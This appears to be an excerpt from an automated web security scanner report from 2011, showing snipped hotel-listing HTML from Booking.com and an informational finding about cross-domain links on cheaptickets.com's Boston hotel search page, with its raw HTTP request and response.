<a href="/hotel/us/the-farrington-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X16"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max1 jq_tooltip" width="43" height="10" title="Max people: 1" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max3 jq_tooltip" width="43" height="10" title="Max people: 3" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max4 jq_tooltip" width="43" height="10" title="Max people: 4" alt="" />
<span class="hideme">
...[SNIP]...
"/hotel/us/renaissance-waterfront.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X17">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Renaissance Waterfront Hotel" style="top: -1408px;" />

</a>
...[SNIP]...
href="/hotel/us/renaissance-waterfront.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X17"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
"/hotel/us/fairmont-battery-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X18">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Fairmont Battery Wharf" style="top: -1496px;" />

</a>
...[SNIP]...
href="/hotel/us/fairmont-battery-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X18"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
;br&gt;" href="/hotel/us/w-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X19">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="W Boston" style="top: -1584px;" />

</a>
...[SNIP]...
<a href="/hotel/us/w-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X19"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
us/hosteling-international-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X20">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Hostelling International Boston" style="top: -1672px;" />

</a>
...[SNIP]...
hotel/us/hosteling-international-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X20"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max1 jq_tooltip" width="43" height="10" title="Max people: 1" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max1 jq_tooltip" width="43" height="10" title="Max people: 1" alt="" />
<span class="hideme">
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<img src="http://s.bstatic.com/static/img/marker-hotel-blue.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-hotel-grey.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport-large.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-city.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>
...[SNIP]...

19.184. http://www.cheaptickets.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...
<meta name="robots" content="NOINDEX,FOLLOW" />
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/CTIX/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/CTIX/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/style/global/printAll.css" media="print">
               <!--[if IE 6]>
...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<a href="http://www.cheaptickets.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/CTIX/brandImages/headerLogo/logo-1.gif" alt="CheapTickets" height="43" width="213" class="logo" />
    </a>
...[SNIP]...
<a href="http://www.cheaptickets.com/App/PrepareDealsHome" class="deals link"> <img src="http://www.tnetnoc.com/siteImages/CTIX/brandImages/deals/dealsLogo-1.png" alt="Cheap of the week" height="58" width="158" />
    </a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/CTIX/banners/hotel/results/telesales/CTIX_Telesales_StalkBar-1.png" alt="Call us to book 1-800-733-1680" height="58" width="160" />
    </div>
...[SNIP]...
/App/PerformMDLPDealsContent?deal_id=fees-slashed&cnt=OVI&type=dm_ht" class="link" data-agent="{
       &#034;type&#034;:&#034;PopupWindow&#034;
       
   }" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/CTIX/banners/hotel/searchBar/marketing/CTIX_Hotel_Marketing_Banner-1.png" alt="" height="30" width="960" class="searchBarBanner" />
    </a>
...[SNIP]...
earch&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.page=1&hsv.location=11231" class="resetLocation link" delegatedtracking="true"> <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/process/remove/extraSmall/extraSmall-1.png" alt="Remove" height="9" width="9" />
    </a>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="starRating" />
   
                                       (6)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="starRating" />
   
                                       (36)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="starRating" />
   
                                       (87)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="starRating" />
   
                                       (37)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star1/medium/star1-1.png" alt="1 star" height="13" width="70" class="starRating" />
   
                                       (4)</span>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=317971&hotel.hkey=317971_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/971/317971/Crowne-Plaza-Hotel-BOSTON-NEWTON-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=319853&hotel.hkey=319853_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/853/319853/W-Boston-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
<div class="specialOffers" >
        <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/value/value/other/specialOfferGraphic-1.png" alt="Special Offer" height="50" width="140" class="valueIcon" />
    <div class="offerText">
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=50080&hotel.hkey=50080_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/080/50080/Super-8-WeymouthBoston-Area-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
<div class="specialOffers" >
        <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/value/value/other/specialOfferGraphic-1.png" alt="Special Offer" height="50" width="140" class="valueIcon" />
    <div class="offerText">
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=21445&hotel.hkey=21445_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=83803&hotel.hkey=83803_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/803/83803/Quality-Inn-Suites-Hotel-Exterior-1-20110806-224126-082_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=32679&hotel.hkey=32679_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/679/32679/Sheraton-Colonial-Boston-North-Hotel-Conference-Center-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=2042&hotel.hkey=2042_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/042/2042/Hampton-Inn-BostonBraintree-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=7222&hotel.hkey=7222_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/222/7222/Hampton-Inn-BostonLogan-Airport-Hotel-Exterior-41_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=65358&hotel.hkey=65358_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/358/65358/Candlewood-Suites-BOSTON-BURLINGTON-Hotel-Exterior-4_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=126192&hotel.hkey=126192_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/192/126192/Homestead-Boston-Burlington-Hotel-Exterior-1-20110806-191241-564_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=16123&hotel.hkey=16123_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/123/16123/Hilton-BostonDedham-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star1/medium/star1-1.png" alt="1 star" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=28337&hotel.hkey=28337_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/337/28337/Motel-6-Boston-North-Danvers-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=46267&hotel.hkey=46267_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/267/46267/Staybridge-Suites-BOSTON-BURLINGTON-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=48073&hotel.hkey=48073_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/073/48073/Econo-Lodge-Malden-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=130650&hotel.hkey=130650_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/650/130650/Hilton-Garden-Inn-BostonBurlington-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=42996&hotel.hkey=42996_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/996/42996/Red-Roof-Inn-Boston-Woburn-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=9964&hotel.hkey=9964_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/964/9964/Red-Roof-Inn-Boston-Logan-Hotel-Exterior-1_thumb.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
            <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="stars" />
    <ul class="pipedList hotelActions">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.showDetails=true&hotel.hid=229656&hotel.hkey=229656_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
               &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/570/67570/364635911/TBNL0-20110329-120058-663.jpg&#034;
           }
   }" />
</a>
...[SNIP]...
</h2>
